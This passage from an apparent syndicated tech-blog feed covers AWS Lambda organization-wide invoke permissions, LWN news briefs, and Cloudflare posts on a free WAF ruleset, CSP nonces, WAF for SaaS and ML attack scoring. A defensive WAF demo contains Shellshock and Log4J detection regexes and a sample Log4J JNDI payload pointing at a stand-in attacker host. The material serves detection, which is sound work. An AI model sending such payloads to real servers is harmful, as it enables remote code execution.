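The same permission can be added programmatically: the Lambda AddPermission API accepts a PrincipalOrgID parameter together with Principal "*", and boto3 exposes these as keyword arguments of `add_permission`. The sketch below only builds those arguments with a hypothetical helper, so it runs without AWS credentials; the actual call is left as a comment.

```python
def org_invoke_permission_kwargs(function_name: str, org_id: str,
                                 statement_id: str = "org-level-permission") -> dict:
    """Keyword arguments for an AddPermission call that grants invoke rights
    to every principal in an AWS Organization (hypothetical helper)."""
    return {
        "FunctionName": function_name,
        "StatementId": statement_id,
        "Action": "lambda:InvokeFunction",
        "Principal": "*",
        "PrincipalOrgID": org_id,
    }


kwargs = org_invoke_permission_kwargs("LogOrganizationEvents", "o-sabhong3hu")
# With credentials for the function's account configured, you could then run:
#   import boto3
#   boto3.client("lambda").add_permission(**kwargs)
print(kwargs)
```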

The Lambda function ‘LogOrganizationEvents’ is in your Management Account. You configured a resource-based policy to allow all the principals in your organization to invoke your Lambda function. Now, invoke the Lambda function from another account within your organization.

Sign in to the MainApp Account, which is another member account in the same organization. Open AWS CloudShell from the AWS Management Console and invoke the Lambda function ‘LogOrganizationEvents’ from the terminal, as shown below. A response status code of 200 means the invocation succeeded. Learn more about invoking Lambda functions from the AWS CLI.

You can now use the aws:PrincipalOrgID condition key in your resource-based policies to more easily restrict access to IAM principals from accounts within an AWS Organization. For more information about this global condition key and for policy examples that use aws:PrincipalOrgID, read the IAM documentation.

If you have questions about or suggestions for this solution, start a new thread on the AWS Lambda forum or contact AWS Support.

For more information, visit Serverless Land.

Post Syndicated from original https://lwn.net/Articles/887930/

For those who do everything in the Emacs editor: the MELPA repository has just gained an OpenStreetMap viewer. A quick test (example shown on the right) suggests that it works reasonably well; click below for the details.

Post Syndicated from original https://lwn.net/Articles/887927/

The gcobol project has announced its existence; it is a compiler for the COBOL language currently implemented as a fork of GCC.

There’s another answer to Why: because a free Cobol compiler is an essential component to any effort to migrate mainframe applications to what mainframe folks still call “distributed systems”. Our goal is a Cobol compiler that will compile mainframe applications on Linux. Not a toy: a full-blooded replacement that solves problems. One that runs fast and whose output runs fast, and has native gdb support.

The developers hope to merge back into GCC after the project has advanced further.

Post Syndicated from Geographics original https://www.youtube.com/watch?v=MRTsVlWRDLA

Post Syndicated from original https://lwn.net/Articles/887914/

Security updates have been issued by Debian (spip), Fedora (chromium), Mageia (chromium-browser-stable, kernel, kernel-linus, and ruby), openSUSE (firefox, flac, java-11-openjdk, protobuf, tomcat, and xstream), Oracle (thunderbird), Red Hat (kpatch-patch and thunderbird), Scientific Linux (thunderbird), Slackware (httpd), SUSE (firefox, flac, glib2, glibc, java-11-openjdk, libcaca, SDL2, squid, sssd, tomcat, xstream, and zsh), and Ubuntu (zsh).

Post Syndicated from The History Guy: History Deserves to Be Remembered original https://www.youtube.com/watch?v=gAv8yT7sVFE

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/waf-for-everyone/

At Cloudflare, we like disruptive ideas. Pair that with our core belief that security is something that should be accessible to everyone and the outcome is a better and safer Internet for all.

This isn’t idle talk. For example, back in 2014, we announced Universal SSL. Overnight, we provided SSL/TLS encryption to over one million Internet properties without anyone having to pay a dime, or configure a certificate. This was good not only for our customers, but also for everyone using the web.

In 2017, we announced unmetered DDoS mitigation. We’ve never asked customers to pay for DDoS bandwidth as it never felt right, but it took us some time to reach the network size where we could offer completely unmetered mitigation for everyone, paying customer or not.

Still, I often get the question: how do we do this? It’s simple, really. We build great, efficient technology that scales well, and this allows us to keep costs low.



Today, we’re doing it again, by providing a Cloudflare WAF (Web Application Firewall) Managed Ruleset to all Cloudflare plans, free of charge.

High-profile vulnerabilities have a major impact across the Internet, affecting organizations of all sizes. We’ve recently seen this with Log4J, but even before that, major vulnerabilities such as Shellshock and Heartbleed left scars across the Internet.

Small application owners and teams don’t always have the time to keep up with fast-moving security patches, so many applications end up compromised or used for nefarious purposes.

With millions of Internet properties behind the Cloudflare proxy, we have a duty to help keep the web safe. And that is what we did with Log4J by deploying mitigation rules for all traffic, including FREE zones. We are now formalizing our commitment by providing a Cloudflare Free Managed Ruleset to all plans on top of our new WAF engine.

If you are on a FREE plan, you are already receiving protection. Over the coming months, all our FREE zone plan users will also receive access to the Cloudflare WAF user interface in the dashboard and will be able to deploy and configure the new ruleset. This ruleset will provide mitigation rules for high profile vulnerabilities such as Shellshock and Log4J among others.

To access our broader set of WAF rulesets (Cloudflare Managed Rules, Cloudflare OWASP Core Ruleset and Cloudflare Leaked Credential Check Ruleset) along with advanced WAF features, customers will still have to upgrade to PRO or higher plans.

With over 32 million HTTP requests per second being proxied by the Cloudflare global network, running the WAF on every single request is no easy task.

WAFs secure all HTTP request components, including bodies, by running a set of rules, sometimes referred to as signatures, that look for specific patterns that could represent a malicious payload. These rules vary in complexity, and the more rules you have, the harder the system is to optimize. Additionally, many rules take advantage of regular expressions, allowing the author to perform complex matching logic.
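A naive version of this signature scanning fits in a few lines of Python. The two rules below are hypothetical, deliberately simple patterns in the spirit of Shellshock and Log4J payloads, not Cloudflare's rules; production rules also normalize encodings and are much harder to evade. The nested loop also shows why the cost grows with the number of rules multiplied by the number of request components.

```python
import re
from dataclasses import dataclass


@dataclass
class Rule:
    rule_id: str
    description: str
    pattern: re.Pattern


# Hypothetical, deliberately naive signatures for illustration only.
RULES = [
    Rule("demo-001", "Shellshock-style function definition", re.compile(r"\(\)\s*\{\s*:;\s*\}")),
    Rule("demo-002", "Log4J-style JNDI lookup", re.compile(r"\$\{jndi:", re.IGNORECASE)),
]


def scan_request(components: dict) -> list:
    """Run every rule against every request component; return (rule_id, component) hits."""
    hits = []
    for name, value in components.items():
        for rule in RULES:
            if rule.pattern.search(value):
                hits.append((rule.rule_id, name))
    return hits


request = {
    "uri": "/index.html",
    "header:user-agent": "${jndi:ldap://attacker.example/a}",
    "body": "",
}
print(scan_request(request))  # [('demo-002', 'header:user-agent')]
```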

All of this needs to happen with a negligible latency impact, as security should not come with a performance penalty and many application owners come to Cloudflare for performance benefits.

By leveraging our new Edge Rules Engine, on which the new WAF is built, we have been able to reach the performance and memory milestones that make us comfortable providing good baseline WAF protection to everyone. Enter the new Cloudflare Free Managed Ruleset.

This ruleset is automatically deployed on any new Cloudflare zone and is specially designed to reduce false positives to a minimum across a very broad range of traffic types. Customers will be able to disable the ruleset, if necessary, or configure the traffic filter or individual rules. As of today, the ruleset contains the following rules:

Whenever a rule matches, an event will be generated in the Security Overview tab, allowing you to inspect the request.

For all new FREE zones, the ruleset will be automatically deployed. The rules are battle tested across the Cloudflare network and are safe to deploy on most applications out of the box. Customers can, in any case, configure the ruleset further by:

All options are easily accessible via the dashboard, but can also be performed via API. Documentation on how to configure the ruleset, once it is available in the UI, will be found on our developer site.

The Cloudflare Free Managed Ruleset will be updated by Cloudflare whenever a relevant wide-ranging vulnerability is discovered. Updates to the ruleset will be published on our change log so that customers can keep up to date with any new rules.

We love building cool new technology. But we also love making it widely available and easy to use. We’re really excited about making the web much safer for everyone with a WAF that won’t cost you a dime. If you’re interested in getting started, just head over here to sign up for our free plan.

Post Syndicated from Simona Badoiu original https://blog.cloudflare.com/cloudflare-zaraz-supports-csp/

Cloudflare Zaraz can be used to manage and load third-party tools on the cloud, achieving significant speed, privacy and security improvements. Content Security Policy (CSP) configuration prevents malicious content from being run on your website.

If you have Cloudflare Zaraz enabled on your website, you don’t have to think twice about enabling CSP, because there is no harmful collision between CSP and Cloudflare Zaraz.

Cloudflare Zaraz, at its core, injects a <script> block on every page where it runs. If the website enforces CSP rules, the injected script can be automatically blocked if inline scripts are not allowed. To prevent this, at the moment of script injection, Cloudflare Zaraz adds a nonce to the script-src policy in order for everything to work smoothly.
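The nonce mechanism itself is small. Below is a minimal sketch, assuming a hypothetical injector that generates one random nonce per response, adds it to script-src as a `'nonce-<value>'` source expression, and puts the same value in the `nonce` attribute of the injected `<script>`. The helper names are illustrative; this is not Zaraz's code.

```python
import base64
import secrets


def make_nonce(num_bytes: int = 16) -> str:
    # A fresh, unguessable value must be generated for every response.
    return base64.b64encode(secrets.token_bytes(num_bytes)).decode("ascii")


def nonce_source(nonce: str) -> str:
    # The source expression that goes into the script-src directive.
    return f"'nonce-{nonce}'"


def tag_inline_script(script_body: str, nonce: str) -> str:
    # The injected inline <script> carries the same value in its nonce attribute.
    return f'<script nonce="{nonce}">{script_body}</script>'


nonce = make_nonce()
print(nonce_source(nonce))
print(tag_inline_script("/* bootstrap code */", nonce))
```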

Cloudflare Zaraz supports CSP whether it is enabled through Content-Security-Policy headers or through Content-Security-Policy <meta> elements.

Content Security Policy (CSP) is a security standard meant to protect websites from Cross-site scripting (XSS) or Clickjacking by providing the means to list approved origins for scripts, styles, images or other web resources.

Although CSP is a reasonably mature technology with most modern browsers already implementing the standard, less than 10% of websites use this extra layer of security. A Google study says that more than 90% of the websites using CSP are still leaving some doors open for attackers.

Why such low adoption and poor configuration? An early study on ‘why CSP adoption is failing’ says that the initial setup for a website is tedious and error-prone, risking more harm to the business than an occasional XSS attack.

We’re writing this to confirm that Cloudflare Zaraz will comply with your CSP settings without any additional configuration on your side, and to share some interesting findings from our research on how CSP works.

Cloudflare Zaraz aims to make the web faster by moving third-party script bloat away from the browser.

Almost every website on the Internet loads tens of third-party tools (analytics, tracking, chatbots, banners, embeds, widgets, etc.). Most of the time, a third party plays a relatively small role on a particular website compared to the large and complex code it ships (for good reason, since that code has to handle every problem the tool can tackle). Loading all of this code again and again on every website is simply inefficient.

Cloudflare Zaraz reduces the amount of code executed on the client side and the client time spent on anything that does not directly serve the user and their experience on the web.

At the same time, Cloudflare Zaraz integrates website owners with third parties through a common management interface with an easy ‘one-click’ method.

When auto-inject is enabled, Cloudflare Zaraz ‘bootstraps’ on your website by running a small inline script that collects basic information from the browser (Screen Resolution, User-Agent, Referrer, page URL) and also provides the main `track` function. The `track` function allows you to track the actions your users are taking on your website, and other events that might happen in real time. Common user actions a website will probably be interested in tracking are successful sign-ups, calls-to-action clicks, and purchases.

Before adding CSP support, Cloudflare Zaraz would have been blocked on any website that implemented CSP without including 'unsafe-inline' in the script-src or default-src directive. Some of our users reported collisions between CSP and Cloudflare Zaraz, so we decided to make peace with CSP once and for all.

To solve the issue, when Cloudflare Zaraz is automatically injected on a website implementing CSP, it enhances the response header by appending a nonce value in the script-src policy. This way we make sure we’re not harming any security that was already enforced by the website owners, and we are still able to perform our duties – making the website faster and more secure by asynchronously running third parties on the server side instead of clogging the browser with irrelevant computation from the user’s point of view.

In the following paragraphs, we describe some interesting CSP details we had to tackle to bring Cloudflare Zaraz to a trustworthy state. They assume that you already know what CSP is and what a simple CSP configuration looks like.

The CSP standard allows multiple CSP headers, but at first glance it’s unclear how multiple headers are handled.

You might expect the CSP rules to be merged somehow, with the final rule being a combination of all of them, but in reality the rule is much simpler: each header’s policy is enforced independently, so effectively the most restrictive policy applies. Relevant examples can be found in the W3C standard’s description and in this multiple CSP headers example.

The rule of thumb is: “A connection will be allowed only if all the CSP headers allow it.”
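That rule of thumb can be sketched as follows. This is a simplified Python model that assumes policies only use exact origins, `'self'` and `*`; real CSP source matching also handles schemes, ports, paths, host wildcards and other keywords. Each header is parsed and checked on its own, and a script loads only if every policy allows it. The helper names are hypothetical.

```python
from urllib.parse import urlsplit


def parse_policy(header_value: str) -> dict:
    """Parse 'directive src src; directive src' into {directive: [sources]}."""
    policy = {}
    for part in header_value.split(";"):
        tokens = part.split()
        if tokens:
            # Directive names are case-insensitive; only the first occurrence counts.
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def allows_script(policy: dict, script_url: str, page_origin: str) -> bool:
    """Simplified check supporting exact origins, 'self' and '*' only."""
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return True  # no applicable directive: this policy does not restrict scripts
    origin = origin_of(script_url)
    return any(
        src == "*" or src == origin or (src == "'self'" and origin == page_origin)
        for src in sources
    )


def allowed_by_all(headers: list, script_url: str, page_origin: str) -> bool:
    """A load succeeds only if every enforced policy allows it."""
    return all(allows_script(parse_policy(h), script_url, page_origin) for h in headers)


headers = [
    "default-src 'self' https://cdn.example.com",
    "script-src 'self'",
]
page = "https://www.example.com"
print(allowed_by_all(headers, "https://www.example.com/app.js", page))  # True
print(allowed_by_all(headers, "https://cdn.example.com/lib.js", page))  # False: second policy blocks it
```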

In order to make sure that the Cloudflare Zaraz script always runs, we add the nonce value to all existing CSP headers and/or <meta http-equiv="Content-Security-Policy"> elements.

Just like when sending multiple CSP headers, when configuring one policy with multiple values, the most restrictive value has priority.

An illustrative example for a given CSP header:

`Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' 'nonce-12345678'`

If 'unsafe-inline' is set in the script-src directive, adding 'nonce-12345678' disables the effect of 'unsafe-inline' in browsers that support CSP Level 2 or later, and only inline scripts that carry that nonce value are allowed to run.
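The interaction between a nonce and 'unsafe-inline' can be modeled with a small hypothetical helper. It checks one inline script against a single script-src source list, following the CSP Level 2+ rule that 'unsafe-inline' is ignored once a nonce or hash source is present. To stay short, it does not compute script hashes, so hash sources only serve to switch 'unsafe-inline' off here.

```python
HASH_PREFIXES = ("'sha256-", "'sha384-", "'sha512-")


def inline_script_allowed(script_src: list, script_nonce=None) -> bool:
    """Simplified CSP Level 2+ check for an inline <script> against one script-src list."""
    nonces = {
        s[len("'nonce-"):-1]
        for s in script_src
        if s.startswith("'nonce-") and s.endswith("'")
    }
    has_hash = any(s.startswith(HASH_PREFIXES) for s in script_src)
    if script_nonce is not None and script_nonce in nonces:
        return True
    if nonces or has_hash:
        # Once a nonce or hash source is present, 'unsafe-inline' is ignored.
        return False
    return "'unsafe-inline'" in script_src


policy = ["'unsafe-inline'", "'nonce-12345678'"]
print(inline_script_allowed(policy, "12345678"))         # True: the nonce matches
print(inline_script_allowed(policy))                     # False: 'unsafe-inline' is now ignored
print(inline_script_allowed(["'unsafe-inline'"]))        # True
```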

Adding the nonce unconditionally is a mistake we already made while trying to make Cloudflare Zaraz compliant with CSP. We solved it by adding the nonce only in the following situations:

Another interesting case was a CSP header without a script-src directive, which relied only on the default-src values. In this case, we copy all the default-src values into a new script-src directive and append the nonce associated with the Cloudflare Zaraz script to it (keeping the previous point in mind, of course).
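Putting these cases together, a header rewrite could look like the sketch below. The function `add_nonce` is hypothetical. The list of situations in which Cloudflare Zaraz adds the nonce is not reproduced here, so skipping policies that already allow 'unsafe-inline' (with no nonce or hash present) is an assumption inferred from the nonce and 'unsafe-inline' interaction described earlier, not a description of Zaraz's exact rules.

```python
KEYED_PREFIXES = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def add_nonce(header_value: str, nonce: str) -> str:
    """Hypothetical rewrite so an inline script carrying `nonce` can run."""
    directives = [part.split() for part in header_value.split(";") if part.split()]
    by_name = {}
    for tokens in directives:
        by_name.setdefault(tokens[0].lower(), tokens)  # first occurrence wins

    if "script-src" in by_name:
        target = by_name["script-src"]
    elif "default-src" in by_name:
        # No script-src: start a new script-src from the default-src sources,
        # so the nonce affects scripts only, not images, styles, etc.
        target = ["script-src"] + by_name["default-src"][1:]
        directives.append(target)
    else:
        return header_value  # this policy does not restrict scripts at all

    sources = target[1:]
    already_keyed = any(s.startswith(KEYED_PREFIXES) for s in sources)
    if "'unsafe-inline'" in sources and not already_keyed:
        # Assumption: inline scripts already run here, and adding a nonce would
        # switch 'unsafe-inline' off for the site's own inline scripts.
        return header_value

    target.append(f"'nonce-{nonce}'")
    return "; ".join(" ".join(tokens) for tokens in directives)


print(add_nonce("default-src 'self'; img-src *", "abc123"))
# default-src 'self'; img-src *; script-src 'self' 'nonce-abc123'
print(add_nonce("default-src 'self'; script-src 'unsafe-inline'", "abc123"))
# default-src 'self'; script-src 'unsafe-inline'
```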

Cloudflare Zaraz is still not 100% compliant with CSP because some tools still need to use eval(), usually for setting cookies, but we’re already working on a different approach, so stay tuned!

The Content-Security-Policy-Report-Only header is not modified by Cloudflare Zaraz yet, so if Cloudflare Zaraz is enabled on your website you will see violation reports about the Cloudflare Zaraz <script> element.

The Content-Security-Policy-Report-Only policy cannot be set using a <meta> element.

Cloudflare Zaraz supports the evolution of a more secure web by seamlessly complying with CSP.

If you encounter any issue or potential edge case that we didn’t cover in our approach, don’t hesitate to write on Cloudflare Zaraz’s Discord Channel. We’re always there fixing issues, listening to feedback, and announcing exciting product updates.

For more details on how Cloudflare Zaraz works and how to use it, check out the official documentation.

[1] https://wiki.mozilla.org/index.php?title=Security/CSP/Spec&oldid=133465

[2] https://storage.googleapis.com/pub-tools-public-publication-data/pdf/45542.pdf

[3] https://en.wikipedia.org/wiki/Content_Security_Policy

[4] https://www.w3.org/TR/CSP2/#enforcing-multiple-policies

[5] https://chrisguitarguy.com/2019/07/05/working-with-multiple-content-security-policy-headers/

[6] https://www.bitsight.com/blog/content-security-policy-limits-dangerous-activity-so-why-isnt-everyone-doing-it

[7] https://wkr.io/publication/raid-2014-content_security_policy.pdf

Post Syndicated from Dina Kozlov original https://blog.cloudflare.com/waf-for-saas/

Some of the largest Software-as-a-Service (SaaS) providers use Cloudflare as the underlying infrastructure to provide their customers with fast loading times, unparalleled redundancy, and the strongest security — all through our Cloudflare for SaaS product. Today, we’re excited to give our SaaS providers new tools that will help them enhance the security of their customers’ applications.

For our Enterprise customers, we’re bringing WAF for SaaS — the ability for SaaS providers to easily create and deploy different sets of WAF rules for their customers. This gives SaaS providers the ability to segment customers into different groups based on their security requirements.

For developers who are getting their application off the ground, we’re thrilled to announce a Free tier of Cloudflare for SaaS for the Free, Pro, and Biz plans, giving our customers 100 custom hostnames free of charge to provision and test across their account. In addition to that, we want to make it easier for developers to scale their applications, so we’re happy to announce that we are lowering our custom hostname price from \$2 to \$0.10 a month.

But that’s not all! At Cloudflare, we believe security should be available for all. That’s why we’re extending a new selection of WAF rules to Free customers — giving all customers the ability to secure both their applications and their customers’.

At Cloudflare, we take pride in our Free tier, which gives any customer the ability to make use of our network to stay secure and online. We are eager to extend the same support to customers looking to build a new SaaS offering, giving them a Free tier of Cloudflare for SaaS and allowing them to onboard 100 custom hostnames at no charge. The 100 custom hostnames will be automatically allocated to new and existing Cloudflare for SaaS customers. Beyond that, we are also dropping the custom hostname price from \$2 to \$0.10 a month, giving SaaS providers the power to onboard and scale their application. Existing Cloudflare for SaaS customers will see the updated custom hostname pricing reflected in their next billing cycle.
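As a worked example of the new pricing, the sketch below estimates the monthly custom hostname bill. It assumes the 100 free hostnames are deducted first and each additional hostname costs \$0.10 per month; actual billing terms may differ by plan or contract. Amounts are kept in integer cents to avoid floating-point rounding, and the function name is hypothetical.

```python
FREE_HOSTNAMES = 100            # included at no charge
PRICE_CENTS_PER_HOSTNAME = 10   # $0.10 per custom hostname per month


def monthly_cost_cents(hostnames: int) -> int:
    # Assumption: only hostnames beyond the free allocation are billed.
    billable = max(0, hostnames - FREE_HOSTNAMES)
    return billable * PRICE_CENTS_PER_HOSTNAME


for n in (50, 100, 1_000):
    print(f"{n} hostnames: ${monthly_cost_cents(n) / 100:.2f} per month")
```

Under this assumption, 1,000 hostnames would come to 900 × \$0.10 = \$90 a month.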

Cloudflare for SaaS started as a TLS certificate issuance product for SaaS providers. Now, we’re helping our customers go a step further in keeping their customers safe and secure.

SaaS providers may have varying customer bases — from mom-and-pop shops to well established banks. No matter the customer, it’s important that as a SaaS provider you’re able to extend the best protection for your customers, regardless of their size.

At Cloudflare, we have spent years building out the best Web Application Firewall for our customers. From managed rules that offer advanced zero-day vulnerability protections to OWASP rules that block popular attack techniques, we have given our customers the best tools to keep themselves protected. Now, we want to hand off the tools to our SaaS providers who are responsible for keeping their customer base safe and secure.

One of the benefits of Cloudflare for SaaS is that SaaS providers can configure security rules and settings on their SaaS zone which their customers automatically inherit. But one size does not fit all, which is why we are excited to give Enterprise customers the power to create various sets of WAF rules that they can then extend as different security packages to their customers — giving end users differing levels of protection depending on their needs.

WAF for SaaS is easy to set up. The example below shows how you can configure different buckets of WAF rules for your various customers.

There’s no limit to the number of rulesets that you can create, so feel free to create a handful of configurations for your customers, or deploy one ruleset per customer — whatever works for you!

Cloudflare for SaaS customers define their customers’ domains by creating custom hostnames. Custom hostnames indicate which domains need to be routed to the SaaS provider’s origin. Custom hostnames can define specific domains, like example.com, or they can extend to wildcards like *.example.com, which allows subdomains under example.com to get routed to the SaaS service. WAF for SaaS supports both types of custom hostnames, so that SaaS providers have flexibility in choosing the scope of their protection.
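How a specific versus wildcard custom hostname might match incoming hosts can be sketched as below. The matching rule is an assumption for illustration: the sketch lets `*.example.com` match exactly one extra label (as a TLS wildcard certificate does) and not the apex `example.com`; the post does not spell out how deeper subdomains are handled. `hostname_matches` is a hypothetical helper.

```python
def hostname_matches(pattern: str, host: str) -> bool:
    """'example.com' matches only itself; '*.example.com' matches one label deep."""
    pattern = pattern.lower().rstrip(".")
    host = host.lower().rstrip(".")
    if pattern.startswith("*."):
        suffix = pattern[1:]  # ".example.com"
        label = host[: -len(suffix)] if host.endswith(suffix) else ""
        return bool(label) and "." not in label
    return host == pattern


print(hostname_matches("*.example.com", "shop.example.com"))    # True
print(hostname_matches("*.example.com", "example.com"))         # False
print(hostname_matches("example.com", "EXAMPLE.com"))           # True
```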

The first step is to create a custom hostname to define your customer’s domain. This can be done through the dashboard or the API.

```bash
curl -X POST "https://api.cloudflare.com/client/v4/zones/{zone:id}/custom_hostnames" \
  -H "X-Auth-Email: {email}" -H "X-Auth-Key: {key}" \
  -H "Content-Type: application/json" \
  --data '{
    "hostname": "example.com",
    "ssl": {"wildcard": true}
  }'
```

Next, create an association between the custom hostnames — your customer’s domain — and the firewall ruleset that you’d like to attach to it.

This is done by associating a JSON blob with a custom hostname. Our Custom Metadata feature lets customers do this easily via the API.

In the example below, a JSON blob with two fields (“customer_id” and “security_level”) will be associated with each request for *.example.com and example.com.

There is no predetermined schema for custom metadata. Field names and structure are fully customisable based on our customers’ needs. In this example, we have chosen the tag “security_level”, to which we expect to assign one of three values (low, medium or high). These will, in turn, trigger three different sets of rules.

```bash
curl -sX PATCH "https://api.cloudflare.com/client/v4/zones/{zone:id}/custom_hostnames/{custom_hostname:id}" \
  -H "X-Auth-Email: {email}" -H "X-Auth-Key: {key}" \
  -H "Content-Type: application/json" \
  -d '{
    "custom_metadata": {
      "customer_id": "12345",
      "security_level": "low"
    }
  }'
```

Finally, you can trigger a rule based on the custom hostname. The custom metadata field e.g. “security_level” is available in the Ruleset Engine where the WAF runs. In this example, “security_level” can be used to trigger different configurations of products such as WAF, Firewall Rules, Advanced Rate Limiting and Transform Rules.
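The mapping from metadata to rules can be illustrated with a short Python sketch. Here `lookup_json_string` is a hypothetical stand-in that only reads a top-level string field (the rules-language function of the same name is more capable), and the ruleset names in `RULESETS_BY_LEVEL` are made up for the example.

```python
import json


def lookup_json_string(metadata_json: str, field: str):
    """Rough stand-in: return the top-level string value of `field`, else None."""
    value = json.loads(metadata_json).get(field)
    return value if isinstance(value, str) else None


# Hypothetical mapping from security_level to the rule sets a provider might run.
RULESETS_BY_LEVEL = {
    "low": ["rate-limit-login"],
    "medium": ["rate-limit-login", "managed-rules"],
    "high": ["rate-limit-login", "managed-rules", "owasp-core"],
}


def rulesets_for(metadata_json: str) -> list:
    level = lookup_json_string(metadata_json, "security_level")
    return RULESETS_BY_LEVEL.get(level, [])


metadata = '{"customer_id": "12345", "security_level": "low"}'
print(rulesets_for(metadata))  # ['rate-limit-login']
```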

Rules can be built through the dashboard or via the API, as shown below. Here, a rate limiting rule is triggered on traffic with “security_level” set to low.

```bash
curl -X PUT "https://api.cloudflare.com/client/v4/zones/{zone:id}/rulesets/phases/http_ratelimit/entrypoint" \
  -H "X-Auth-Email: {email}" -H "X-Auth-Key: {key}" \
  -H "Content-Type: application/json" \
  -d '{
    "rules": [
      {
        "action": "block",
        "ratelimit": {
          "characteristics": [
            "cf.colo.id",
            "ip.src"
          ],
          "period": 10,
          "requests_per_period": 2,
          "mitigation_timeout": 60
        },
        "expression": "lookup_json_string(cf.hostname.metadata, \"security_level\") eq \"low\" and http.request.uri contains \"login\""
      }
    ]
  }'
```
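To see what the rule's parameters mean in practice, the sketch below simulates them with a simple fixed-window counter keyed by the rule's characteristics (data center and client IP). This is a simplified model under stated assumptions, not Cloudflare's counting algorithm, and it only counts requests that have already matched the rule's expression. The class name and sample values are hypothetical.

```python
from collections import defaultdict

PERIOD = 10              # "period": counting window in seconds
REQUESTS_PER_PERIOD = 2  # "requests_per_period"
MITIGATION_TIMEOUT = 60  # "mitigation_timeout": seconds to keep blocking


class FixedWindowLimiter:
    """Simplified fixed-window model keyed by (colo, client IP)."""

    def __init__(self):
        self.counts = defaultdict(int)  # (key, window index) -> requests seen
        self.blocked_until = {}         # key -> time when blocking ends

    def allow(self, colo: str, ip: str, now: float) -> bool:
        key = (colo, ip)
        if self.blocked_until.get(key, 0) > now:
            return False  # still inside the mitigation timeout
        window = int(now // PERIOD)
        self.counts[(key, window)] += 1
        if self.counts[(key, window)] > REQUESTS_PER_PERIOD:
            self.blocked_until[key] = now + MITIGATION_TIMEOUT
            return False
        return True


limiter = FixedWindowLimiter()
results = [limiter.allow("FRA", "203.0.113.7", t) for t in (0, 1, 2, 30, 61, 62)]
print(results)  # [True, True, False, False, False, True]
```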

If you’d like to learn more about our Advanced Rate Limiting rules, check out our documentation.

We’re excited to be the provider for our SaaS customers’ infrastructure needs. From custom domains to TLS certificates to Web Application Firewall, we’re here to help. Sign up for Cloudflare for SaaS today, or if you’re an Enterprise customer, reach out to your account team to get started with WAF for SaaS.

Post Syndicated from Daniele Molteni original https://blog.cloudflare.com/waf-ml/

Cloudflare handles 32 million HTTP requests per second and is used by more than 22% of all the websites whose web server is known by W3Techs. Cloudflare is in the unique position of protecting traffic for 1 out of 5 Internet properties which allows it to identify threats as they arise and track how these evolve and mutate.

The Web Application Firewall (WAF) sits at the core of Cloudflare’s security toolbox and Managed Rules are a key feature of the WAF. They are a collection of rules created by Cloudflare’s analyst team that block requests when they show patterns of known attacks. These managed rules work extremely well for patterns of established attack vectors, as they have been extensively tested to minimize both false negatives (missing an attack) and false positives (finding an attack when there isn’t one). On the downside, managed rules often miss attack variations (also known as bypasses) as static regex-based rules are intrinsically sensitive to signature variations introduced, for example, by fuzzing techniques.

We witnessed this issue when we released protections for log4j. For a few days after the vulnerability was made public, we had to constantly update the rules to match variations and mutations as attackers tried to bypass the WAF. Moreover, optimizing rules requires significant human intervention, and it usually works only after bypasses have been identified or even exploited, making the protection reactive rather than proactive.

Today we are excited to complement managed rulesets (such as OWASP and Cloudflare Managed) with a new tool aimed at identifying bypasses and malicious payloads without human involvement, and before they are exploited. Customers can now access signals from a machine learning model trained on the good/bad traffic as classified by managed rules and augmented data to provide better protection across a broader range of old and new attacks.

Welcome to our new Machine Learning WAF detection.

The new detection is available in Early Access for Enterprise, Pro and Biz customers. Please join the waitlist if you are interested in trying it out. In the long term, it will be available to the higher tier customers.

The new detection system complements existing managed rulesets by providing three major advantages:

The secret sauce is a combination of innovative machine learning modeling, a vast training dataset built on the attacks we block daily as well as data augmentation techniques, the right evaluation and testing framework based on the behavioral testing principle and cutting-edge engineering that allows us to assess each request with negligible latency.

The new detection is based on the paradigm launched with Bot Analytics. Following this approach, each request is evaluated, and a score assigned, regardless of whether we are taking actions on it. Since we score every request, users can visualize how the score evolves over time for the entirety of the traffic directed to their server.

Furthermore, users can visualize the histogram of how requests were scored for a specific attack vector (such as SQLi) and find what score is a good value to separate good from bad traffic.

The actual mitigation is performed with custom WAF rules where the score is used to decide which requests should be blocked. This allows customers to create rules whose logic includes any parameter of the HTTP requests, including the dynamic fields populated by Cloudflare, such as bot scores.

We are now looking at extending this approach to the managed rules too (OWASP and Cloudflare Managed). Customers will be able to identify trends and create rules based on patterns that are visible in their overall traffic, rather than creating rules by trial and error, logging traffic to validate them, and only then enforcing protection.

Machine learning–based detections complement the existing managed rulesets, such as OWASP and Cloudflare Managed. The system is based on models designed to identify variations of attack patterns and anomalies without the direct supervision of researchers or the end user.

As of today, we expose scores for two attack vectors: SQL injection (SQLi) and Cross-Site Scripting (XSS). Users can create custom WAF/Firewall rules using three separate scores: a total score (cf.waf.ml.score) and one each for SQLi and XSS (cf.waf.ml.score.sqli and cf.waf.ml.score.xss, respectively). Scores range from 1 to 99, with 1 meaning definitely malicious and 99 meaning valid traffic.
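The three scores and their 1 to 99 range can be modeled as a small value type. This sketch assumes, as described above, that a lower score means more likely malicious, and uses an illustrative threshold of 20. How the total score is derived from the per-vector scores is not described here, so the sketch simply takes it as given; the class and function names are hypothetical.

```python
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class WafMlScores:
    total: int  # cf.waf.ml.score
    sqli: int   # cf.waf.ml.score.sqli
    xss: int    # cf.waf.ml.score.xss

    def __post_init__(self) -> None:
        # Every score must fall in the documented 1..99 range.
        for name in ("total", "sqli", "xss"):
            value = getattr(self, name)
            if not 1 <= value <= 99:
                raise ValueError(f"{name} score {value} outside 1..99")


def flagged_vectors(scores: WafMlScores, threshold: int = 20) -> List[str]:
    """Names of attack vectors scoring below the threshold (likely malicious)."""
    per_vector = {"sqli": scores.sqli, "xss": scores.xss}
    return [name for name, value in per_vector.items() if value < threshold]


print(flagged_vectors(WafMlScores(total=5, sqli=5, xss=97)))  # ['sqli']
```

Exposing per-vector scores next to the total means a rule can target one attack class without being triggered by the other.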

The model is trained on traffic classified by the existing WAF rules, and it works on a transformed version of the original request, which makes attack fingerprints easier to identify.

For each request, the model scores each part of the request independently, so that it is possible to pinpoint where a malicious payload was found: for example, in the request body, the URI or the headers.
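Scoring each part independently makes it possible to point at the part that carries the payload. In this sketch the scorer is a deliberately crude keyword check standing in for the real model (an assumption, for illustration only), and the request parts and their names are also hypothetical.

```python
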